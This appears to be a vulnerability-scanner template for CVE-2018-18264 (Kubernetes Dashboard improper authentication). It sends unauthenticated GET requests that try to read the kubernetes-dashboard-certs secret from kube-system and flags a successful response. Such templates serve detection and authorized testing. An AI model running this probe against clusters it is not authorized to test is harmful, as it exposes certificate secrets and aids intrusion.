id: CVE-2018-18264
info:
  name: Kubernetes Improper Authentication
  risk: High

params:
  - root: '{{.BaseURL}}'


variables:
  - endpoints: |
      /api/v1/
      /k8s/api/v1/
requests:
  - method: GET
    redirect: false
    url: >-
     {{.root}}{{.endpoints}}namespaces/kube-system/secrets/kubernetes-dashboard-certs
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "apiVersion") && StringSearch("response", "objectRef")
references:
  - https://www.cvebase.com/cve/2018/18264